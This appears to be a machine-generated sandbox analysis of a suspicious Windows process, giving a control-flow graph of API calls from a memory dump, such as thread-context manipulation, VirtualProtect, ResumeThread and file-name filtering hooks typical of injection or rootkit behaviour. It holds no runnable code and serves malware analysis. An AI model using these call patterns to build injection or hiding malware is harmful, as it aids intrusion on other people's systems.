15804->15800 15846 1929162dd78 15805->15846 15808 1929162e24c GetOEMCP 15810 1929162e273 15808->15810 15809 1929162e25e 15809->15810 15811 1929162e263 GetACP 15809->15811 15810->15792 15812 1929162c5d0 15810->15812 15811->15810 15813 1929162c61b 15812->15813 15817 1929162c5df __std_exception_copy 15812->15817 15814 1929162d1f4 __std_exception_copy 13 API calls 15813->15814 15816 1929162c619 15814->15816 15815 1929162c602 HeapAlloc 15815->15816 15815->15817 15816->15777 15816->15779 15817->15813 15817->15815 15818 1929162b470 __std_exception_copy 2 API calls 15817->15818 15818->15817 15820 1929162e22c 16 API calls 15819->15820 15821 1929162e91b 15820->15821 15822 1929162ea71 15821->15822 15824 1929162e958 IsValidCodePage 15821->15824 15829 1929162e972 15821->15829 15823 19291628070 _invalid_parameter_noinfo 8 API calls 15822->15823 15825 1929162e6a9 15823->15825 15824->15822 15826 1929162e969 15824->15826 15825->15782 15825->15787 15827 1929162e998 GetCPInfo 15826->15827 15826->15829 15827->15822 15827->15829 15862 1929162e344 15829->15862 15960 1929162c558 EnterCriticalSection 15830->15960 15847 1929162dd97 15846->15847 15848 1929162dd9c 15846->15848 15847->15808 15847->15809 15848->15847 15849 1929162cab0 _invalid_parameter_noinfo 14 API calls 15848->15849 15850 1929162ddb7 15849->15850 15854 1929162ffb4 15850->15854 15855 1929162ffc9 15854->15855 15856 1929162ddda 15854->15856 15855->15856 15857 19291630a40 _invalid_parameter_noinfo 14 API calls 15855->15857 15858 19291630020 15856->15858 15857->15856 15859 19291630035 15858->15859 15861 19291630048 15858->15861 15860 1929162e8c4 _invalid_parameter_noinfo 14 API calls 15859->15860 15859->15861 15860->15861 15861->15847 15863 1929162e38f GetCPInfo 15862->15863 15864 1929162e485 15862->15864 15863->15864 15865 1929162e3a2 15863->15865 15866 19291628070 _invalid_parameter_noinfo 8 API calls 15864->15866 15873 19291631474 15865->15873 15867 1929162e524 15866->15867 15867->15822 15874 1929162dd78 14 API calls 15873->15874 15875 192916314b6 15874->15875 15893 1929162ec58 15875->15893 15895 1929162ec61 MultiByteToWideChar 15893->15895 15962 1929162c335 15961->15962 15963 1929162c33f 15961->15963 15962->15963 15968 1929162c35a 15962->15968 15964 1929162d1f4 __std_exception_copy 13 API calls 15963->15964 15965 1929162c346 15964->15965 15966 1929162d04c _invalid_parameter_noinfo 38 API calls 15965->15966 15967 1929162c352 15966->15967 15967->15759 15968->15967 15969 1929162d1f4 __std_exception_copy 13 API calls 15968->15969 15969->15965 15971 1929162be9a 15970->15971 15972 1929162bec1 15970->15972 15971->15761 15973 1929162beea 15972->15973 15974 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15972->15974 15975 1929162d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15973->15975 15974->15972 15975->15971 15976 192913ec510 15977 192913ec518 15976->15977 15979 192913ec545 15977->15979 15980 192913ec574 15977->15980 15981 192913ec59f 15980->15981 15982 192913ec582 DeleteCriticalSection 15981->15982 15983 192913ec5a3 15981->15983 15982->15981 15983->15979 18573 192913f4611 __scrt_dllmain_exception_filter 17997 192913e8f0c 18004 192913e946c 17997->18004 18000 192913e8f19 18005 192913e9474 18004->18005 18007 192913e94a5 18005->18007 18009 192913e8f15 18005->18009 18021 192913e9d28 18005->18021 18008 192913e94b4 __vcrt_uninitialize_locks DeleteCriticalSection 18007->18008 18008->18009 18009->18000 18010 192913e9400 18009->18010 18026 192913e9bfc 18010->18026 18022 192913e9aac __vcrt_FlsAlloc 5 API calls 18021->18022 18023 192913e9d5e 18022->18023 18024 192913e9d68 18023->18024 18025 192913e9d73 InitializeCriticalSectionAndSpinCount 18023->18025 18024->18005 18025->18024 18027 192913e9aac __vcrt_FlsAlloc 5 API calls 18026->18027 18028 192913e9c21 TlsAlloc 18027->18028 18574 192913e820c 18581 192913e8f34 18574->18581 18577 192913e8219 18582 192913e9340 __CxxCallCatchBlock 9 API calls 18581->18582 18583 192913e8215 18582->18583 18583->18577 18584 192913ec288 18583->18584 18585 192913ecb10 __std_exception_copy 13 API calls 18584->18585 18586 192913e8222 18585->18586 18586->18577 18587 192913e8f48 18586->18587 18590 192913e92dc 18587->18590 18589 192913e8f51 18589->18577 18591 192913e92ed 18590->18591 18592 192913e9302 18590->18592 18593 192913e9c8c __CxxCallCatchBlock 6 API calls 18591->18593 18592->18589 18594 192913e92f2 18593->18594 18596 192913e9cd4 18594->18596 18597 192913e9aac __vcrt_FlsAlloc 5 API calls 18596->18597 18598 192913e9d02 18597->18598 18599 192913e9d14 TlsSetValue 18598->18599 18600 192913e9d0c 18598->18600 18599->18600 18600->18592 18601 19291621e3c LoadLibraryA GetProcAddress 18602 19291621e62 Sleep 18601->18602 18603 19291621e6f 18601->18603 18602->18602 15984 192913eb500 15989 192913ec558 EnterCriticalSection 15984->15989 18053 192913e2300 18054 192913e2331 18053->18054 18055 192913e2447 18054->18055 18061 192913e2355 18054->18061 18062 192913e2412 18054->18062 18056 192913e244c 18055->18056 18057 192913e24bb 18055->18057 18070 192913e35c8 GetProcessHeap HeapAlloc 18056->18070 18060 192913e35c8 11 API calls 18057->18060 18057->18062 18059 192913e238d StrCmpNIW 18059->18061 18060->18062 18061->18059 18061->18062 18064 192913e1d30 18061->18064 18065 192913e1d57 GetProcessHeap HeapAlloc 18064->18065 18066 192913e1db4 18064->18066 18065->18066 18067 192913e1d92 18065->18067 18066->18061 18068 192913e1cfc 2 API calls 18067->18068 18069 192913e1d9a GetProcessHeap HeapFree 18068->18069 18069->18066 18074 192913e361b 18070->18074 18071 192913e36d9 GetProcessHeap HeapFree 18071->18062 18072 192913e36d4 18072->18071 18073 192913e3666 StrCmpNIW 18073->18074 18074->18071 18074->18072 18074->18073 18075 192913e1d30 6 API calls 18074->18075 18075->18074 16634 192913ecbfc 16639 192913ef3a0 16634->16639 16636 192913ecc05 16637 192913ecb10 __std_exception_copy 13 API calls 16636->16637 16638 192913ecc22 __vcrt_uninitialize_ptd 16636->16638 16637->16638 16640 192913ef3b1 16639->16640 16641 192913ef3b5 16639->16641 16640->16636 16641->16640 16642 192913eef88 9 API calls 16641->16642 16642->16640 16643 19291634848 16646 1929162904c 16643->16646 16647 19291629064 16646->16647 16648 19291629076 16646->16648 16647->16648 16649 1929162906c 16647->16649 16650 19291629324 _CallSETranslator 9 API calls 16648->16650 16651 19291629074 16649->16651 16653 19291629324 _CallSETranslator 9 API calls 16649->16653 16652 1929162907b 16650->16652 16652->16651 16655 19291629324 _CallSETranslator 9 API calls 16652->16655 16654 1929162909b 16653->16654 16656 19291629324 _CallSETranslator 9 API calls 16654->16656 16655->16651 16657 192916290a8 16656->16657 16662 1929162c2f4 16657->16662 16663 1929162cab0 _invalid_parameter_noinfo 14 API calls 16662->16663 16664 1929162c2fd 16663->16664 16665 192913e5ff9 16666 192913e6000 VirtualProtect 16665->16666 16667 192913e6029 GetLastError 16666->16667 16668 192913e5f10 16666->16668 16667->16668 18622 192913e41f9 18625 192913e4146 18622->18625 18623 192913e41b0 18624 192913e4196 VirtualQuery 18624->18623 18624->18625 18625->18623 18625->18624 18626 192913e41ca VirtualAlloc 18625->18626 18626->18623 18627 192913e41fb GetLastError 18626->18627 18627->18623 18627->18625 18076 192913f46f5 18077 192913e9324 __CxxCallCatchBlock 9 API calls 18076->18077 18078 192913f470d 18077->18078 18079 192913e9324 __CxxCallCatchBlock 9 API calls 18078->18079 18080 192913f4728 18079->18080 18081 192913e9324 __CxxCallCatchBlock 9 API calls 18080->18081 18082 192913f473c 18081->18082 18083 192913e9324 __CxxCallCatchBlock 9 API calls 18082->18083 18084 192913f477e 18083->18084 16669 192913e2ff0 16670 192913e3061 16669->16670 16671 192913e3384 16670->16671 16672 192913e308d GetModuleHandleA 16670->16672 16673 192913e30b1 16672->16673 16674 192913e309f GetProcAddress 16672->16674 16673->16671 16675 192913e30d8 StrCmpNIW 16673->16675 16674->16673 16675->16671 16681 192913e30fd 16675->16681 16676 192913e1a30 6 API calls 16676->16681 16677 192913e320f lstrlenW 16677->16681 16678 192913e32b9 lstrlenW 16678->16681 16679 192913e1cfc StrCmpIW StrCmpW 16679->16681 16680 192913e3f88 StrCmpNIW 16680->16681 16681->16671 16681->16676 16681->16677 16681->16678 16681->16679 16681->16680 16040 192913eacec 16043 192913e90c0 16040->16043 16042 192913ead15 16044 192913e90e1 16043->16044 16045 192913e9116 16043->16045 16044->16045 16047 192913ec328 16044->16047 16045->16042 16048 192913ec33f 16047->16048 16049 192913ec335 16047->16049 16050 192913ed1f4 __std_exception_copy 13 API calls 16048->16050 16049->16048 16054 192913ec35a 16049->16054 16051 192913ec346 16050->16051 16052 192913ed04c _invalid_parameter_noinfo 38 API calls 16051->16052 16053 192913ec352 16052->16053 16053->16045 16054->16053 16055 192913ed1f4 __std_exception_copy 13 API calls 16054->16055 16055->16051 16682 192913eb7ea 16694 192913ec2f4 16682->16694 16695 192913ecab0 _invalid_parameter_noinfo 14 API calls 16694->16695 16696 192913ec2fd 16695->16696 16697 192913e27e8 16698 192913e2867 16697->16698 16699 192913e28c9 GetFileType 16698->16699 16711 192913e2998 16698->16711 16700 192913e28ed 16699->16700 16701 192913e28d7 StrCpyW 16699->16701 16713 192913e1ad4 GetFinalPathNameByHandleW 16700->16713 16702 192913e28fc 16701->16702 16704 192913e2906 16702->16704 16705 192913e299d 16702->16705 16707 192913e3f88 StrCmpNIW 16704->16707 16704->16711 16718 192913e3708 StrCmpIW 16704->16718 16722 192913e1dd4 16704->16722 16706 192913e3f88 StrCmpNIW 16705->16706 16708 192913e3708 4 API calls 16705->16708 16709 192913e1dd4 2 API calls 16705->16709 16705->16711 16706->16705 16707->16704 16708->16705 16709->16705 16714 192913e1afe StrCmpNIW 16713->16714 16715 192913e1b3d 16713->16715 16714->16715 16716 192913e1b18 lstrlenW 16714->16716 16715->16702 16716->16715 16717 192913e1b2a StrCpyW 16716->16717 16717->16715 16719 192913e3751 PathCombineW 16718->16719 16720 192913e373a StrCpyW StrCatW 16718->16720 16721 192913e375a 16719->16721 16720->16721 16721->16704 16723 192913e1df4 16722->16723 16724 192913e1deb 16722->16724 16723->16704 16725 192913e1530 2 API calls 16724->16725 16725->16723 16735 192913ef3e4 16736 192913ef3ee 16735->16736 16737 192913ef41d 16735->16737 16736->16737 16738 192913ef403 FreeLibrary 16736->16738 16738->16736 16739 192913f33e4 16740 192913f33fb 16739->16740 16741 192913f33f5 CloseHandle 16739->16741 16741->16740 16742 192913e63e3 16743 192913e63f0 16742->16743 16744 192913e655a 16743->16744 16745 192913e63fc GetThreadContext 16743->16745 16749 192913e6581 VirtualProtect FlushInstructionCache 16744->16749 16750 192913e663e 16744->16750 16745->16744 16746 192913e6422 16745->16746 16746->16744 16747 192913e6449 16746->16747 16748 192913e64cd 16747->16748 16754 192913e64a6 SetThreadContext 16747->16754 16749->16744 16751 192913e665e 16750->16751 16760 192913e4b20 16750->16760 16764 192913e5530 GetCurrentProcess 16751->16764 16754->16748 16755 192913e66b7 16758 192913e8070 _invalid_parameter_noinfo 8 API calls 16755->16758 16756 192913e6677 ResumeThread 16757 192913e6663 16756->16757 16757->16755 16757->16756 16759 192913e66ff 16758->16759 16762 192913e4b3c 16760->16762 16761 192913e4b9f 16761->16751 16762->16761 16763 192913e4b52 VirtualFree 16762->16763 16763->16762 16765 192913e554c 16764->16765 16766 192913e5562 VirtualProtect FlushInstructionCache 16765->16766 16767 192913e5593 16765->16767 16766->16765 16767->16757 18090 192913f06e0 18091 192913f06f9 18090->18091 18092 192913f06e9 18090->18092 18093 192913ed1f4 __std_exception_copy 13 API calls 18092->18093 18094 192913f06ee 18093->18094 18095 192913ed04c _invalid_parameter_noinfo 38 API calls 18094->18095 18095->18091 18649 192913e25dc 18651 192913e265a 18649->18651 18650 192913e2777 18651->18650 18652 192913e26bf GetFileType 18651->18652 18653 192913e26e1 18652->18653 18654 192913e26cd StrCpyW 18652->18654 18655 192913e1ad4 4 API calls 18653->18655 18658 192913e26ee 18654->18658 18655->18658 18656 192913e3f88 StrCmpNIW 18656->18658 18657 192913e3708 4 API calls 18657->18658 18658->18650 18658->18656 18658->18657 18659 192913e1dd4 2 API calls 18658->18659 18659->18658 18096 192913ef6dc 18099 192913ef6e8 18096->18099 18098 192913ef70f 18099->18098 18100 192913f1c0c 18099->18100 18101 192913f1c11 18100->18101 18105 192913f1c4c 18100->18105 18102 192913f1c44 18101->18102 18103 192913f1c32 DeleteCriticalSection 18101->18103 18104 192913ed2a0 __free_lconv_num 13 API calls 18102->18104 18103->18102 18103->18103 18104->18105 18105->18099 18109 192913e2ed8 18111 192913e2f35 18109->18111 18110 192913e2f50 18111->18110 18112 192913e38a8 3 API calls 18111->18112 18112->18110 18660 192913ec1d8 18661 192913ec209 18660->18661 18662 192913ec1f1 18660->18662 18662->18661 18663 192913ed2a0 __free_lconv_num 13 API calls 18662->18663 18663->18661 16056 192913eb0d4 16063 192913eb007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 16056->16063 16057 192913eb0fb 16058 192913e9324 __CxxCallCatchBlock 9 API calls 16057->16058 16059 192913eb100 16058->16059 16060 192913e9324 __CxxCallCatchBlock 9 API calls 16059->16060 16061 192913eb10b __FrameHandler3::GetHandlerSearchState 16059->16061 16060->16061 16062 192913e99cc 9 API calls Is_bad_exception_allowed 16062->16063 16063->16057 16063->16061 16063->16062 16065 192913e99f4 16063->16065 16066 192913e9324 __CxxCallCatchBlock 9 API calls 16065->16066 16067 192913e9a02 16066->16067 16067->16063 16816 19291626430 16817 1929162643d 16816->16817 16818 19291626449 16817->16818 16823 1929162655a 16817->16823 16819 192916264cd 16818->16819 16820 192916264a6 SetThreadContext 16818->16820 16820->16819 16821 19291626581 VirtualProtect FlushInstructionCache 16821->16823 16822 1929162663e 16824 1929162665e 16822->16824 16832 19291624b20 16822->16832 16823->16821 16823->16822 16836 19291625530 GetCurrentProcess 16824->16836 16827 19291626663 16828 19291626677 ResumeThread 16827->16828 16829 192916266b7 16827->16829 16828->16827 16830 19291628070 _invalid_parameter_noinfo 8 API calls 16829->16830 16831 192916266ff 16830->16831 16834 19291624b3c 16832->16834 16833 19291624b9f 16833->16824 16834->16833 16835 19291624b52 VirtualFree 16834->16835 16835->16834 16837 1929162554c 16836->16837 16838 19291625562 VirtualProtect FlushInstructionCache 16837->16838 16839 19291625593 16837->16839 16838->16837 16839->16827 16068 192913f494f 16069 192913f495e 16068->16069 16070 192913f4968 16068->16070 16072 192913ec5ac LeaveCriticalSection 16069->16072 18664 192913e824c 18666 192913e8270 __scrt_acquire_startup_lock 18664->18666 18665 192913eb581 18666->18665 18667 192913ecb10 __std_exception_copy 13 API calls 18666->18667 18668 192913eb5aa 18667->18668 16073 192913ead48 16074 192913e9324 __CxxCallCatchBlock 9 API calls 16073->16074 16075 192913ead7d 16074->16075 16076 192913e9324 __CxxCallCatchBlock 9 API calls 16075->16076 16077 192913ead8b __except_validate_context_record 16076->16077 16078 192913e9324 __CxxCallCatchBlock 9 API calls 16077->16078 16079 192913eadcf 16078->16079 16080 192913e9324 __CxxCallCatchBlock 9 API calls 16079->16080 16081 192913eadd8 16080->16081 16082 192913e9324 __CxxCallCatchBlock 9 API calls 16081->16082 16083 192913eade1 16082->16083 16096 192913e993c 16083->16096 16086 192913e9324 __CxxCallCatchBlock 9 API calls 16087 192913eae11 __CxxCallCatchBlock 16086->16087 16103 192913e9978 16087->16103 16089 192913e9324 __CxxCallCatchBlock 9 API calls 16090 192913eaefe 16089->16090 16092 192913e9324 __CxxCallCatchBlock 9 API calls 16090->16092 16093 192913eaf07 16092->16093 16095 192913eaeeb __CxxCallCatchBlock 16095->16089 16097 192913e9324 __CxxCallCatchBlock 9 API calls 16096->16097 16098 192913e994d 16097->16098 16099 192913e9958 16098->16099 16100 192913e9324 __CxxCallCatchBlock 9 API calls 16098->16100 16101 192913e9324 __CxxCallCatchBlock 9 API calls 16099->16101 16100->16099 16102 192913e9969 16101->16102 16102->16086 16102->16087 16104 192913e9324 __CxxCallCatchBlock 9 API calls 16103->16104 16105 192913e998a 16104->16105 16106 192913e99c5 16105->16106 16107 192913e9324 __CxxCallCatchBlock 9 API calls 16105->16107 16108 192913e9995 16107->16108 16108->16106 16109 192913e9324 __CxxCallCatchBlock 9 API calls 16108->16109 16110 192913e99b6 16109->16110 16110->16095 16111 192913e8ff8 16110->16111 16112 192913e9324 __CxxCallCatchBlock 9 API calls 16111->16112 16113 192913e9006 16112->16113 16113->16095 16854 192913f4848 16857 192913e904c 16854->16857 16858 192913e9076 16857->16858 16859 192913e9064 16857->16859 16861 192913e9324 __CxxCallCatchBlock 9 API calls 16858->16861 16859->16858 16860 192913e906c 16859->16860 16862 192913e9074 16860->16862 16864 192913e9324 __CxxCallCatchBlock 9 API calls 16860->16864 16863 192913e907b 16861->16863 16863->16862 16865 192913e9324 __CxxCallCatchBlock 9 API calls 16863->16865 16866 192913e909b 16864->16866 16865->16862 16867 192913e9324 __CxxCallCatchBlock 9 API calls 16866->16867 16868 192913e90a8 16867->16868 16869 192913ec2f4 14 API calls 16868->16869 16870 192913e90b1 16869->16870 16871 192913ec2f4 14 API calls 16870->16871 16872 192913e90bd 16871->16872 18675 192913eae42 18676 192913e9324 __CxxCallCatchBlock 9 API calls 18675->18676 18677 192913eae4f __CxxCallCatchBlock 18676->18677 18678 192913eae93 RaiseException 18677->18678 18679 192913eaeba 18678->18679 18680 192913e9978 __CxxCallCatchBlock 9 API calls 18679->18680 18684 192913eaec2 18680->18684 18681 192913eaeeb __CxxCallCatchBlock 18682 192913e9324 __CxxCallCatchBlock 9 API calls 18681->18682 18683 192913eaefe 18682->18683 18685 192913e9324 __CxxCallCatchBlock 9 API calls 18683->18685 18684->18681 18687 192913e8ff8 __CxxCallCatchBlock 9 API calls 18684->18687 18686 192913eaf07 18685->18686 18687->18681 16873 192913ef440 GetProcessHeap 18145 192913eff40 18146 192913eff4b 18145->18146 18154 192913f2c24 18146->18154 18167 192913ec558 EnterCriticalSection 18154->18167 15000 192913e1e3c LoadLibraryA GetProcAddress 15001 192913e1e6f 15000->15001 15002 192913e1e62 SleepEx 15000->15002 15002->15002 16128 192913ebd34 16129 192913ebd4d 16128->16129 16138 192913ebd49 16128->16138 16143 192913ee864 16129->16143 16134 192913ebd5f 16136 192913ed2a0 __free_lconv_num 13 API calls 16134->16136 16135 192913ebd6b 16169 192913ebda8 16135->16169 16136->16138 16140 192913ed2a0 __free_lconv_num 13 API calls 16141 192913ebd92 16140->16141 16142 192913ed2a0 __free_lconv_num 13 API calls 16141->16142 16142->16138 16144 192913ee871 16143->16144 16145 192913ebd52 16143->16145 16188 192913ecacc 16144->16188 16149 192913eedc8 GetEnvironmentStringsW 16145->16149 16147 192913ee8a0 16193 192913ee53c 16147->16193 16150 192913ebd57 16149->16150 16152 192913eedf8 16149->16152 16150->16134 16150->16135 16151 192913eece8 WideCharToMultiByte 16153 192913eee49 16151->16153 16152->16151 16154 192913eee53 FreeEnvironmentStringsW 16153->16154 16155 192913ec5d0 14 API calls 16153->16155 16154->16150 16156 192913eee63 16155->16156 16157 192913eee6b 16156->16157 16158 192913eee74 16156->16158 16159 192913ed2a0 __free_lconv_num 13 API calls 16157->16159 16160 192913eece8 WideCharToMultiByte 16158->16160 16161 192913eee72 16159->16161 16162 192913eee97 16160->16162 16161->16154 16163 192913eee9b 16162->16163 16164 192913eeea5 16162->16164 16165 192913ed2a0 __free_lconv_num 13 API calls 16163->16165 16166 192913ed2a0 __free_lconv_num 13 API calls 16164->16166 16167 192913eeea3 FreeEnvironmentStringsW 16165->16167 16166->16167 16167->16150 16170 192913ebdcd 16169->16170 16171 192913ed220 __std_exception_copy 13 API calls 16170->16171 16182 192913ebe03 16171->16182 16172 192913ebe0b 16173 192913ed2a0 __free_lconv_num 13 API calls 16172->16173 16174 192913ebd73 16173->16174 16174->16140 16175 192913ebe6d 16176 192913ed2a0 __free_lconv_num 13 API calls 16175->16176 16176->16174 16177 192913ed220 __std_exception_copy 13 API calls 16177->16182 16178 192913ebe92 16384 192913ebebc 16178->16384 16180 192913ec328 __std_exception_copy 38 API calls 16180->16182 16182->16172 16182->16175 16182->16177 16182->16178 16182->16180 16184 192913ebea6 16182->16184 16186 192913ed2a0 __free_lconv_num 13 API calls 16182->16186 16183 192913ed2a0 __free_lconv_num 13 API calls 16183->16172 16185 192913ed06c _invalid_parameter_noinfo 17 API calls 16184->16185 16187 192913ebeb9 16185->16187 16186->16182 16189 192913ecae8 FlsGetValue 16188->16189 16191 192913ecae4 16188->16191 16189->16191 16190 192913ecafe 16190->16147 16191->16190 16192 192913ec940 __std_exception_copy 13 API calls 16191->16192 16192->16190 16216 192913ee7ac 16193->16216 16198 192913ee58e 16198->16145 16201 192913ee5a7 16202 192913ed2a0 __free_lconv_num 13 API calls 16201->16202 16202->16198 16203 192913ee5b6 16203->16203 16242 192913ee8e0 16203->16242 16206 192913ee6b2 16207 192913ed1f4 __std_exception_copy 13 API calls 16206->16207 16209 192913ee6b7 16207->16209 16208 192913ee70d 16211 192913ee774 16208->16211 16253 192913ee05c 16208->16253 16212 192913ed2a0 __free_lconv_num 13 API calls 16209->16212 16210 192913ee6cc 16210->16208 16213 192913ed2a0 __free_lconv_num 13 API calls 16210->16213 16215 192913ed2a0 __free_lconv_num 13 API calls 16211->16215 16212->16198 16213->16208 16215->16198 16217 192913ee7cf 16216->16217 16222 192913ee7d9 16217->16222 16268 192913ec558 EnterCriticalSection 16217->16268 16223 192913ee571 16222->16223 16225 192913ecacc 14 API calls 16222->16225 16228 192913ee22c 16223->16228 16226 192913ee8a0 16225->16226 16227 192913ee53c 56 API calls 16226->16227 16227->16223 16269 192913edd78 16228->16269 16231 192913ee25e 16233 192913ee263 GetACP 16231->16233 16234 192913ee273 16231->16234 16232 192913ee24c GetOEMCP 16232->16234 16233->16234 16234->16198 16235 192913ec5d0 16234->16235 16236 192913ec61b 16235->16236 16240 192913ec5df __std_exception_copy 16235->16240 16237 192913ed1f4 __std_exception_copy 13 API calls 16236->16237 16239 192913ec619 16237->16239 16238 192913ec602 HeapAlloc 16238->16239 16238->16240 16239->16201 16239->16203 16240->16236 16240->16238 16241 192913eb470 __std_exception_copy 2 API calls 16240->16241 16241->16240 16243 192913ee22c 16 API calls 16242->16243 16244 192913ee91b 16243->16244 16245 192913eea71 16244->16245 16246 192913ee958 IsValidCodePage 16244->16246 16252 192913ee972 16244->16252 16247 192913e8070 _invalid_parameter_noinfo 8 API calls 16245->16247 16246->16245 16249 192913ee969 16246->16249 16248 192913ee6a9 16247->16248 16248->16206 16248->16210 16250 192913ee998 GetCPInfo 16249->16250 16249->16252 16250->16245 16250->16252 16285 192913ee344 16252->16285 16383 192913ec558 EnterCriticalSection 16253->16383 16270 192913edd9c 16269->16270 16276 192913edd97 16269->16276 16271 192913ecab0 _invalid_parameter_noinfo 14 API calls 16270->16271 16270->16276 16272 192913eddb7 16271->16272 16277 192913effb4 16272->16277 16276->16231 16276->16232 16278 192913effc9 16277->16278 16280 192913eddda 16277->16280 16279 192913f0a40 _invalid_parameter_noinfo 14 API calls 16278->16279 16278->16280 16279->16280 16281 192913f0020 16280->16281 16282 192913f0048 16281->16282 16283 192913f0035 16281->16283 16282->16276 16283->16282 16284 192913ee8c4 _invalid_parameter_noinfo 14 API calls 16283->16284 16284->16282 16286 192913ee38f GetCPInfo 16285->16286 16295 192913ee485 16285->16295 16292 192913ee3a2 16286->16292 16286->16295 16287 192913e8070 _invalid_parameter_noinfo 8 API calls 16289 192913ee524 16287->16289 16289->16245 16296 192913f1474 16292->16296 16295->16287 16297 192913edd78 14 API calls 16296->16297 16298 192913f14b6 16297->16298 16316 192913eec58 16298->16316 16318 192913eec61 MultiByteToWideChar 16316->16318 16388 192913ebe9a 16384->16388 16389 192913ebec1 16384->16389 16385 192913ebeea 16386 192913ed2a0 __free_lconv_num 13 API calls 16385->16386 16386->16388 16387 192913ed2a0 __free_lconv_num 13 API calls 16387->16389 16388->16183 16389->16385 16389->16387 16874 192913e6430 16875 192913e643d 16874->16875 16876 192913e6449 16875->16876 16885 192913e655a 16875->16885 16877 192913e64cd 16876->16877 16878 192913e64a6 SetThreadContext 16876->16878 16878->16877 16879 192913e6581 VirtualProtect FlushInstructionCache 16879->16885 16880 192913e663e 16881 192913e665e 16880->16881 16883 192913e4b20 VirtualFree 16880->16883 16882 192913e5530 3 API calls 16881->16882 16884 192913e6663 16882->16884 16883->16881 16886 192913e66b7 16884->16886 16887 192913e6677 ResumeThread 16884->16887 16885->16879 16885->16880 16888 192913e8070 _invalid_parameter_noinfo 8 API calls 16886->16888 16887->16884 16889 192913e66ff 16888->16889 16890 192913eec30 GetCommandLineA GetCommandLineW 16891 192913ec828 16892 192913ec82d 16891->16892 16893 192913ec842 16891->16893 16897 192913ec848 16892->16897 16898 192913ec88a 16897->16898 16899 192913ec892 16897->16899 16900 192913ed2a0 __free_lconv_num 13 API calls 16898->16900 16901 192913ed2a0 __free_lconv_num 13 API calls 16899->16901 16900->16899 16902 192913ec89f 16901->16902 16903 192913ed2a0 __free_lconv_num 13 API calls 16902->16903 16904 192913ec8ac 16903->16904 16905 192913ed2a0 __free_lconv_num 13 API calls 16904->16905 16906 192913ec8b9 16905->16906 16907 192913ed2a0 __free_lconv_num 13 API calls 16906->16907 16908 192913ec8c6 16907->16908 16909 192913ed2a0 __free_lconv_num 13 API calls 16908->16909 16910 192913ec8d3 16909->16910 16911 192913ed2a0 __free_lconv_num 13 API calls 16910->16911 16912 192913ec8e0 16911->16912 16913 192913ed2a0 __free_lconv_num 13 API calls 16912->16913 16914 192913ec8ed 16913->16914 16915 192913ed2a0 __free_lconv_num 13 API calls 16914->16915 16916 192913ec8fd 16915->16916 16917 192913ed2a0 __free_lconv_num 13 API calls 16916->16917 16918 192913ec90d 16917->16918 16923 192913ec6f8 16918->16923 16937 192913ec558 EnterCriticalSection 16923->16937 18224 192913e4320 18225 192913e426d 18224->18225 18226 192913e42bd VirtualQuery 18225->18226 18227 192913e42d7 18225->18227 18228 192913e4322 GetLastError 18225->18228 18226->18225 18226->18227 18228->18225 16939 192913ef820 16942 192913ef7d8 16939->16942 16947 192913ec558 EnterCriticalSection 16942->16947 18731 192913efe20 18732 192913efe4a 18731->18732 18733 192913ed220 __std_exception_copy 13 API calls 18732->18733 18734 192913efe6a 18733->18734 18735 192913ed2a0 __free_lconv_num 13 API calls 18734->18735 18736 192913efe78 18735->18736 18737 192913efea2 18736->18737 18739 192913ed220 __std_exception_copy 13 API calls 18736->18739 18738 192913efec1 InitializeCriticalSectionEx 18737->18738 18742 192913efeab 18737->18742 18738->18737 18740 192913efe94 18739->18740 18741 192913ed2a0 __free_lconv_num 13 API calls 18740->18741 18741->18737 16955 192916263e3 16956 192916263f0 16955->16956 16957 192916263fc GetThreadContext 16956->16957 16958 1929162655a 16956->16958 16957->16958 16959 19291626422 16957->16959 16960 19291626581 VirtualProtect FlushInstructionCache 16958->16960 16961 1929162663e 16958->16961 16959->16958 16965 19291626449 16959->16965 16960->16958 16963 1929162665e 16961->16963 16966 19291624b20 VirtualFree 16961->16966 16962 192916264cd 16964 19291625530 3 API calls 16963->16964 16970 19291626663 16964->16970 16965->16962 16967 192916264a6 SetThreadContext 16965->16967 16966->16963 16967->16962 16968 192916266b7 16971 19291628070 _invalid_parameter_noinfo 8 API calls 16968->16971 16969 19291626677 ResumeThread 16969->16970 16970->16968 16970->16969 16972 192916266ff 16971->16972 16402 1929162acec 16405 192916290c0 16402->16405 16404 1929162ad15 16406 19291629116 16405->16406 16407 192916290e1 16405->16407 16406->16404 16407->16406 16408 1929162c328 __std_exception_copy 38 API calls 16407->16408 16408->16406 16409 192913e2518 GetProcessIdOfThread GetCurrentProcessId 16410 192913e25be 16409->16410 16411 192913e2543 CreateFileW 16409->16411 16411->16410 16412 192913e2577 WriteFile ReadFile CloseHandle 16411->16412 16412->16410 18743 192913ec218 18744 192913ed2a0 __free_lconv_num 13 API calls 18743->18744 18745 192913ec228 18744->18745 18746 192913ed2a0 __free_lconv_num 13 API calls 18745->18746 18747 192913ec23c 18746->18747 18748 192913ed2a0 __free_lconv_num 13 API calls 18747->18748 18749 192913ec250 18748->18749 18750 192913ed2a0 __free_lconv_num 13 API calls 18749->18750 18751 192913ec264 18750->18751 17002 1929162b7ea 17003 1929162c2f4 14 API calls 17002->17003 17004 1929162b7ef 17003->17004 17005 1929162b815 GetModuleHandleW 17004->17005 17006 1929162b85f 17004->17006 17005->17006 17010 1929162b822 17005->17010 17019 1929162b6f8 17006->17019 17010->17006 17014 1929162b904 GetModuleHandleExW 17010->17014 17015 1929162b938 GetProcAddress 17014->17015 17016 1929162b94a 17014->17016 17015->17016 17017 1929162b962 17016->17017 17018 1929162b95b FreeLibrary 17016->17018 17017->17006 17018->17017 17031 1929162c558 EnterCriticalSection 17019->17031

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3508256782.00000192913E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000192913E0000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3507302928.00000192913E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3509739616.00000192913F5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3510641431.0000019291400000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3511580095.0000019291402000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3512425263.0000019291409000.00000002.00001000.00020000.00000000.sdmpDownload File
